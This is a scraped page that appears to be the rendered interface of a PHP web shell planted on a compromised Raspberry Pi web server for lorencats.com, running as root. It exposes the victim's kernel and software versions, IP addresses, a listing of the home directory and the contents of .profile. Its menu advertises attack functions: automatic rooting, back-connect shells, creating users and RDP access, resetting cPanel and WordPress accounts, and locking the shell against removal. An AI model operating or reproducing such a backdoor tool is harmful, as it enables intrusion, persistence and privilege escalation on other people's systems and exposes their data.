Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
pi /
[ HOME SHELL ]
Name
Size
Permission
Action
.cache
[ DIR ]
drwxr-xr-x
.config
[ DIR ]
drwx------
.cups
[ DIR ]
drwx------
.gnupg
[ DIR ]
drwx------
.local
[ DIR ]
drwxr-xr-x
.pki
[ DIR ]
drwx------
.pp_backup
[ DIR ]
drwx------
.vnc
[ DIR ]
drwx------
2TB
[ DIR ]
drwxrwxrwx
Bookshelf
[ DIR ]
drwxr-xr-x
Desktop
[ DIR ]
drwxr-xr-x
Documents
[ DIR ]
drwxr-xr-x
Downloads
[ DIR ]
drwxr-xr-x
Music
[ DIR ]
drwxr-xr-x
Pictures
[ DIR ]
drwxr-xr-x
Public
[ DIR ]
drwxr-xr-x
Templates
[ DIR ]
drwxr-xr-x
Videos
[ DIR ]
drwxr-xr-x
ZEROSSL
[ DIR ]
drwxr-xr-x
.Xauthority
114
B
-rw-------
.bash_history
694
B
-rw-------
.bash_logout
220
B
-rw-r--r--
.bashrc
3.44
KB
-rw-r--r--
.profile
807
B
-rw-r--r--
.xscreensaver
8.58
KB
-rw-r--r--
.xsession-errors
2.45
KB
-rw-------
.xsession-errors.old
2.37
KB
-rw-------
websitebackup.gz
80.53
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .profile
# ~/.profile: executed by the command interpreter for login shells. # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login # exists. # see /usr/share/doc/bash/examples/startup-files for examples. # the files are located in the bash-doc package. # the default umask is set in /etc/profile; for setting the umask # for ssh logins, install and configure the libpam-umask package. #umask 022 # if running bash if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/bin" ] ; then PATH="$HOME/bin:$PATH" fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/.local/bin" ] ; then PATH="$HOME/.local/bin:$PATH" fi
Close